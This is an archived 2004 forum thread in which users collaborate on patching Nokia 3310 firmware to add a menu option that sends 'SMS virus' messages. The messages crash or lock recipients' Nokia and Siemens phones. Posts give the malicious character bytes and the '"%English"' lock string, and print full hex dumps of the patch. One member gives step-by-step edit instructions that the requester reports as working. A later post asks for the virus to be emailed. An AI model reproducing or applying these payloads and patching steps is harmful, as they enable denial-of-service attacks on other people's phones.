PDA

View Full Version : SMS-Virus for Siemens g3n0lite 2.0



ShadoW2004
06-06-2004, 01:12 PM
Somebody can explain how to make SMS virus for Siemens and add it to menustructure, like SMS Virus for Nokia's?

danwood76
06-06-2004, 09:20 PM
Well the virus would only work if you sent it to the nokia 3310s etc
basically you just need to add the Unicode character to your phones firmware

I cant remember the unicode character but it is in nfree all over the place so search ;)

regards,
Danny

Zandis
06-06-2004, 09:39 PM
GsmCyber made that. Just compare orginal Viruz patch and GsmCyber`s modded and c the difference ;)

ShadoW2004
07-06-2004, 05:47 AM
For Nokia phones virus is: Љ (or in hex-codes 0x04 0x05 0x15 0x8A) :)

GsmCyber
07-06-2004, 11:29 AM
The code to lock Siemens is "%English" ... with the "" ;)

Cya

mestrini
07-06-2004, 01:16 PM
with which phones does the siemens "viruz" work?

can the SMS be sent from other brands?

ShadoW2004
08-06-2004, 05:38 AM
The code to lock Siemens is "%English" ... with the "" ;)

Cya


GsmCyber, how to insert it to FLS?
I wont to have Virus for Nokia's and Virus for Siemens! A seem at your page http://www.versionx.web.pt/ that you did that! Please exlpain how...

GsmCyber
08-06-2004, 02:25 PM
it's very hard for me explain that in english :(

but studing my flash u will understand how u can made that... ;)

It will work on x35, x45 and some versions for x55 and x60!!!

Cya

ShadoW2004
08-06-2004, 08:50 PM
it's very hard for me explain that in english :(

but studing my flash u will understand how u can made that... ;)

It will work on x35, x45 and some versions for x55 and x60!!!

Cya

But where I can download version of 3325i with this function?
Do you have script with SMS Viruz for Siemens?

Zandis
09-06-2004, 12:35 AM
For siemens (from GsmCyber`s flash) -
002200250045006E0067006C0069007300680022000004FF006B00690063006B00650064002000680069006D0020003B00290000000004FF0062006F006D00620069006E0067002E002E002E000000330F1200330F4800330F280000000000E2000A0016000000330F6005020000B50F4803212222004B02F7B7FF0ABD0F0000C5E000330F74

ShadoW2004
09-06-2004, 05:31 AM
2 Zandis

And where I must past it?

I think I must patch my FLS secondary with Viruz (g3n0lite 2.0) and change Љ to "%English" ... but how?

NokDoc
09-06-2004, 05:59 PM
Mr. Shadow,

Silly suggestion, but I think every phone is capable of sending that piece of text, no need to use a modded flash.

Goto sms editor, compose a msg with %Shark and send to a Siemens.

NokDoc

ShadoW2004
09-06-2004, 07:01 PM
2 NokDoc

I know that, it's easy to enter "%English" and send it, but I wont to have menu "Send Siemens Virus"!

Can somebody explain how?

NokDoc
09-06-2004, 07:07 PM
Hi,

Ok, like U wish...

One last:

I know 3310 have option to use predefined texts, templates. ;)

NokDoc

GsmCyber
09-06-2004, 09:04 PM
Mr. Shadow,

Silly suggestion, but I think every phone is capable of sending that piece of text, no need to use a modded flash.

Goto sms editor, compose a msg with %Shark and send to a Siemens.

NokDoc

U forget the "" ;)

Shadow... i don't have a script for that...i changed the original ViruZ patched by g3n0lite...look for this -»

found 0010 bytes for function sms_to_send at 0x00xxxxxx
found 0030 bytes for function sms_success at 0x00xxxxxx
found 0024 bytes for function sms_progress at 0x00xxxxxx
found 0020 bytes for function sms_info at 0x00xxxxxx
found 0012 bytes for function sms_cmd at 0x00xxxxxx
found 0024 bytes for function own_send_hack at 0x00xxxxxx

Studing this u will find a way to create a personal sms...

Cya

ShadoW2004
10-06-2004, 07:32 AM
I will try! How can I contact you if I have any qestions?

ShadoW2004
10-06-2004, 07:35 AM
U forget the "" ;)

Shadow... i don't have a script for that...i changed the original ViruZ patched by g3n0lite...look for this -»

found 0010 bytes for function sms_to_send at 0x00xxxxxx
found 0030 bytes for function sms_success at 0x00xxxxxx
found 0024 bytes for function sms_progress at 0x00xxxxxx
found 0020 bytes for function sms_info at 0x00xxxxxx
found 0012 bytes for function sms_cmd at 0x00xxxxxx
found 0024 bytes for function own_send_hack at 0x00xxxxxx

Studing this u will find a way to create a personal sms...

Cya

What fuction I must change? sms_to_send?

danwood76
10-06-2004, 09:56 AM
The own_send_hack function is the main one and it uses all the others so you will just need to find out which part actually contains the message
have a look through it with winArm

you will have to convert that %english into hexadecimal I think using AsicII values

regards,
Danny

kraze1984
10-06-2004, 03:37 PM
The code to lock Siemens is "%English" ... with the "" ;)

Cya

Cool!
Are there any possibilities to lock other fones via SMS?

grrreeetz

Zandis
10-06-2004, 11:31 PM
The code to lock Siemens is "%English" ... with the "" ;)

Cya

I think that that code is "%English"! (with "" and !), but this code can b something like "%Dutch"! or "%German"! (dont have siemens at the time to test them, but i think it should work ;))

ShadoW2004
11-06-2004, 06:14 AM
2 Zandis

Yes it may be one of the languages from attaced phone!

Zandis
11-06-2004, 07:45 PM
About that "!" I was wrong. :D

GsmCyber
12-06-2004, 12:53 PM
I think that that code is "%English"! (with "" and !), but this code can b something like "%Dutch"! or "%German"! (dont have siemens at the time to test them, but i think it should work ;))

No ! :p

To lock "%Dutch" and others the target phone must have that languages on flash :p

Cya

ShadoW2004
12-06-2004, 06:17 PM
2 GsmCyber

I inserted "%English" to flash file (look attachment), flashed my phone and tryed send SMS with this virus but I have resived sh" (need "%English") I think it becouse original Viruz patch (g3n0lite) for nokia inserting place for 5 sinbols to have Љ how I need correct it?

ShadoW2004
13-06-2004, 12:36 PM
I inserted what gives Zandis, saved, fixed checks and flashed phone!
Send this virus and reseved only:

lish"

Why :-?

Printscreen of what I do in attach!

Help somebody!

GsmCyber
14-06-2004, 05:26 PM
lol...g3n0lite reserve 10bytes... "%English" is more than 10 bytes... ;)

ShadoW2004
14-06-2004, 07:20 PM
2 GsmCyber

I know, but what I mast do?

ShadoW2004
20-06-2004, 06:52 AM
How I must register more than 10 bytes for "%English"???

Uberpea
20-06-2004, 11:08 AM
:evil: :evil: thats evil dont do it, and if u do do it dont ask how 2 do it on a forum cos making viruses illegal and now every1 knws it was u!!!!!!!!

Crux
20-06-2004, 11:59 AM
:evil: :evil: thats evil dont do it, and if u do do it dont ask how 2 do it on a forum cos making viruses illegal and now every1 knws it was u!!!!!!!!

LOLOLOLOL

that was funny :D

ShadoW2004
20-06-2004, 05:45 PM
:evil: :evil: thats evil dont do it, and if u do do it dont ask how 2 do it on a forum cos making viruses illegal and now every1 knws it was u!!!!!!!!

:grin: :grin: :grin: I know :grin: :grin: :grin:

ShadoW2004
01-07-2004, 10:40 AM
lol...g3n0lite reserve 10bytes... "%English" is more than 10 bytes... ;)

I know...
Please write how I must to reser more bytes for word "%English" !?
Thahks for helping...

ShadoW2004
20-07-2004, 08:07 AM
May be somebody can help me ???

danwood76
23-07-2004, 07:43 PM
Maybee you should look at the code where the characters are inserted

Use winarm to view the different commands and functions that are called up then see where the characters are actually sent
I would look for you but my PC is not 100% normall yet

regards,
Danny

ShadoW2004
25-07-2004, 06:55 AM
g3n0lite reserve 10bytes... "%English" is more than 10 bytes
I can't find it in winarm =(

ShadoW2004
01-08-2004, 05:43 PM
Somebody know how to realise it?

danwood76
02-08-2004, 01:19 PM
I will look into it for you :)
Now I have my PC running at 110% I thinkl modding will start again :)

regards,
Danny

ShadoW2004
02-08-2004, 05:14 PM
Thanks danwood76, please reply to forum if when you will know how...

danwood76
02-08-2004, 08:59 PM
Here is a dump of the code from the Viruz Patch

0030303030000210000000004FF006B00690063006B00650064002000680069006D0020003B00290000000004FF0062006F006D00620069006E0067002E002E002E00000033096C00330998003309780000000000E2000A000A0000003309B005020000B50F4803212222004B02F7B8FE38BD0F0000C5E0003309C4

If you look at the code most of it is comprised off addresses and text
All the addresses will be different for different flashes.
The last bit between B50F and BD0F is the Function you call which sends the message (highlighted yellow)
If you look in winArm it loads up a Dword into the R3 from the address a few bytes before
The Number highlighted red is what I assume is the counter for the number of bytes it sends
so now it is 0x0A or 10 and you will need to increase this number, in Cybers flash this is a value of 0x16 or 22 bytes
Then I assume that the message is stored in the first part of the function I have highlighted orange

These are just my first thoughts
I have not got my flasher handy quite yet so I havent tried this myself :)

regards,
Danny

danwood76
03-08-2004, 12:50 AM
Hi I just dug out my flasher and testing on a 3310
it is working correctly with my alterations as follows:

Here is code dump from my 3310 with changes made
also I have split it up into each function of the code that g3n0lite makesso you can see the changes I made easier

Address Code

33098E 002200250065006E0067006C00690073006800220000
3309A4 04FF006B00690063006B00650064002000680069006D0020003B002900000000
3309C4 04FF0062006F006D00620069006E0067002E002E002E0000
3309DC 0033098E003309C4003309A40000000000E2000A
3309F0 00140000003309DC05020000
3309FC B50F4803212222004B02F7B8FE22BD0F
130A0C 0000C5E0003309F0

You will notice when you open your flash in hex workshop that g3n0lite leaves a lot of free space before your patch :) this is good it enables you too change the bits just before the viruz code
simply change the 5 bytes before the first bit of code to 0's
Then type in your "%english" leaving a 00 (hex) between each character
In hex "%english" is 002200250065006E0067006C0069007300680022 with the needed 00 between each character

You will then need to change the hex that points to the start of your text this is highlighted yellow it will be different in your file but you must make sure that points to the first byte of your "%english" (on the 00)

you will then need to change the 000A to 0014 if you look at highlighted red piece in code this is it :)

Hope I solved your little problem
regards,
Danny

ShadoW2004
03-08-2004, 08:22 AM
@danwood76

Can you attach printscreen of working in HexWorkshop?

ShadoW2004
03-08-2004, 10:31 AM
@danwood76

Check Me :-o

[Look attachment]

danwood76
03-08-2004, 11:38 AM
Nearly there :)
What you have to remember is that the flashing address starts at 0x200000 and not 0x000000 so the address you write will be +0x200000

in your example the address 0x121F7E will be 0x321F7E

other than that it looks good :)

regards,
Danny

danwood76
03-08-2004, 11:51 AM
Here is a screen dump of the edit :)

regards,
Danny

ShadoW2004
03-08-2004, 02:27 PM
@danwood76

Thank you so BIG! All works Good!

NokDoc
03-08-2004, 06:20 PM
Hi,

That's my Dan. ;)

Ps, maybe it's not relevant here, but make it a habit to add '00' after each text string U use. (extra character)

In case of 16bits text, add '0000'. (2 extra chars)

This since the Nokia (and also PC) can decide where the text should end normally.

(Null terminated strings)

NokDoc

danwood76
03-08-2004, 06:29 PM
That is ok mate

regards,
Danny

vakkom
21-01-2006, 12:54 AM
please send me nokia 3310 sms virus this my e mail id

[email protected]